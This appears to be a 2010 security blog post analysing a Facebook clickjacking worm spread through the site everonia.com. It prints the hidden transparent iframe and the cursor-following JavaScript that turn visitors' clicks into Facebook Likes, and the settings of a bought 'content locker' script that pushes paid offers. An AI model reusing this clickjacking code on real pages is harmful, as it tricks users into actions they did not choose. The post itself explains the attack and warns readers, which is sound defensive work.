Tuesday, September 21, 2010

"The Hottest girls on Facebook" everonia.com malware analysis

Another worm spreading with clickjacking technique is now active, targetting Facebook users. If your FB friends display something similar to this:

The hottest girls on facebook on everonia.com

don't follow the link. If you're curious, what is happening & how the attack works, read on.

The clickjacking part

When following the link (it can be blocked by Facebook any minute, so hurry), you reach everonia.com page promising you to look at top 25 hottest girls on FB. The page looks like this:

But something weird is happening once you want to continue. I've made a quick video on everonia.com clickjacking to show what's really going on:


Fetching thee page source, one can easily see the clickjacking frame: 
<div style="overflow: hidden; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="aaaa">       
     <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Feveronia.com%2F&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;font&amp;colorscheme=dark&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:20px; height:20px;" allowTransparency="true" id="xxx" name="xxx"></iframe>
    </div>
and the code that moves the frame with the mouse movements to make it always appear where the cursor is.
var xxx = 0;
// aaa is a div encapsulating iframe
var aaaa = document.getElementById('aaaa');    
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body

// reposition the frame
function lololol(e){
  // account for different browsers (ie/others)
  if (window.event) {
    aaaa.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
    aaaa.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
  } 
  else {
    aaaa.style.top = (e.pageY-5)+'px';
    aaaa.style.left = (e.pageX-5)+'px';
  }
}
// attach to mouse movements
  document.onmousemove = function(e) {
    if (xxx == 0) {lololol(e);}
  }
So it's a simple clickjacking page that tricks users into clicking on the page (top 25 girls, remember? ;) ) when in fact they are liking the site on Facebook effectively spreading among other FB users. But what's more interesting is what happens next.

Human Verification Process

The page quickly redirects to a 2nd page (2.htm) which looks like this:
Everonia.com - human verification process.
 The mouse context menu is disabled and you're being tempted into clicking one of those links. The script performing the actions (lock.js) is obfuscated and bought from a BlackHatCodeBreaker.com website selling script that... well let's just cite them:
The idea is simple: people come to your page, and it looks tempting. They want to access your content or download some freebie - but HEY - Your content is locked! Now all they need to do is just fill-in this short offer...

BlackHat CodeBreaker lets you monetize your content by requiring users to complete CPA surveys to gain access to your content. And the nicest part is, it lets you do so even if you don't have any content!
So, the script (they sell it for $79) displays some advertising links that the website owner will gain advertisements income from and it tries to "lock the page" from accessing the (most likely fake) content before clicking on the link - that's the Human Verification Process dialog. Indeed, look at the lock.js variables:
// 1. TEXT FIELDS (see section 3.3.1 in the manual)
  // HEADLINE
  var blocker_headline = 'Human Verification Process';

  // INSTRUCTIONAL TEXT ABOVE THE LINKS
  var blocker_instructionalText = 'This window will close once you have completed one of the following tasks.';

  // FOOTER TEXT BELOW THE LINKS
  var blocker_footerText = 'This is to prevent Bots from entering into our site';

// 2. TIMERS (see section 3.3.2 in the manual)
  // UNLOCKING TIMER, in Seconds
  var timeout_in_seconds_from_click = 300;

  // TEASE TIMER, in Seconds
  var tease_timer = 0;

  // COOKIE DURATION, in Days, Hours and Minutes
  var cookie_duration_days = 1000;
  var cookie_duration_hours = 0;
  var cookie_duration_minutes = 0;
 
// 3. BASIC CONFIGURATION (see section 3.3.3 in the manual)
  // BHCB FILES PATH 
     // The path to the directory holding all Blackhat Codebreaker files (lock.js, links.txt, goto.php, goto2.php, lock.png etc.)
     // The path must not have more than 90 characters
     // If the files are at the same place as the locked page, use:
     //    var bhcb_files_path = '';
     // If they are at another directory, provide its path
     // For WordPress blogs I recommend using: 
     //    var bhcb_files_path = '/wp-content/plugins/bhcb/';
  var bhcb_files_path = '';

  // HIDE REFERRER ('YES' Hides Referrer, 'NO' Does not hide the referrer)
  var hide_referrer = 'YES';

  // UNLOCK ENTIRE SITE ('YES') OR JUST THIS DIRECTORY ('NO')
  var unlock_entire_site = 'NO';
    
  // RANDOMIZE CPA OFFERS ('YES'), and how many offer links to display when randomizing
  var random_link_rotation = 'YES';
  var number_of_links_to_display = 4;
    
  // TEST MODE ('NO' for operational pages, 'YES' when testing your setup, always return to 'NO' when you finish testing)
  var test_mode = 'NO';

  // BLOCK RIGHT CLICK MENU ('YES' disables right-click menu, 'NO' doesn't disable)
  var block_rightclick_menu = 'YES';

// 4. LOOK AND FEEL (see section 3.3.4 in the manual)
  // POSITION AND WIDTH OF LOCK PANEL, in Pixels
  var panel_vertical_position = 200;
  var panel_width = 500;

  // BACKGROUND COLOR AND IMAGE
     // * background_color controls the background color of the lock panel. Value is given in Hex RGB.
     //   For example, background_color = '#FFFF00' Will result in a Yellow background. Default is '#FFFFFF' (White)
     // * border_color controls the color of the lock panel's border. Value is given in Hex RGB. Default is '#CCCCCC' (Light Gray)
     // * background_image is the name of the background image to use in the lock panel. Default is 'lock.png' (the green padlock image)
     // * background_image_repeat specifies (images smaller than the lock panel) whether to repeat the image ('YES') or show it only once ('NO'). Default is 'NO'.
  var background_color = '#FFFFFF';
  var border_color = '#CCCCCC';
  var background_image = 'lock.png';
  var background_image_repeat = 'NO';
  
  // HAZE COLOR AND OPACITY
     // haze_color controls the haze covering your page content, in Hex RGB. Default is '#000000' (Black)
     // haze_opacity controls the opacity of the haze. 
     //    0 is completely transparent, 100 is completely opaque. Default is 50
  var haze_color = '#000000';
  var haze_opacity = 50;
  
  // TEXT COLORS, in Hex RGB.
     // Defaults are: headline_color = '#466805' (GREENISH), instructionalText_color = '#000000' (BLACK),
     //    footerText_color = '#000000' (BLACK) and links_color = '#0000FF' (BLUE)
  var headline_color = '#466805';
  var instructionalText_color = '#000000';
  var footerText_color = '#000000';
  var links_color = '#0000FF';
So this explains everything - the website is set up to collect CPA money from Facebook users and does not host any malware (for now). But I have a

Bonus for patient readers

The lock.js script is obfuscated. I don't like obfuscation, so I present to you a fully deobfuscated version of BlackHatCodeBreakers.com file (you don't have to pay $$ for this shitty software). It turned out that the code:
  • reads links from links.txt file fetched by XmlHttpRequest
  • randomizes the links, optionally limiting them
  • blocks mouse clicks & mouse context menu
  • processes the links trough two redirect scripts : get.php and get2.php to lose HTTP Referer header (hey, that's what they claim)
  • displays the links within a padlock dialog
  • after clicking, the page is optionally "unlocked"

Deobfuscation process

Beating this obfuscation was, as always, fun. At the beginning it had a dictionary array of all the strings used. First I had to convert Javascript hex-encoded strings [1.js] to plain ones [2.js] (Python helped).
// 1.js
var _0x5f02=[
"\x74\x65\x78\x74\x2F\x78\x6D\x6C",
"\x6F\x76\x65\x72\x72\x69\x64\x65\x4D\x69\x6D\x65\x54\x79\x70\x65",
...
// 2.js
var _one = [
  'text/xml',
  'overrideMimeType',
...
Then I had to dereference all dictionary calls [3.js]:
// replace this:
oxmlhttp[_one[1]](_one[0]);
// with this:
oxmlhttp['overrideMimeType']('text/xml');
Unix nl , regular expressions and php str_replace()  proved themselves useful at this point.

After all that I only had to replace variable names to readable ones and interpret the resulting code [4.js]. As usual, all files are stored on my github page so you could experiment yourselves.

If you'd like to know more on Facebook worms & facebook security, browse my site for the 'facebook' tag.
at 1:31 AM
Labels: , , , , , , ,

1 comment:

NBAY said...

Wow. That was totally interesting!  Thanks for the knowledge. Most of it is over my head but I want to learn how to code.  So I did enjoy the read.  Thank you for sharing.

Now off to check out your website. (smile)
http://www.NBAYclassifieds.com

June 15, 2011 at 4:32 AM

Post a Comment

Subscribe to: Post Comments (Atom)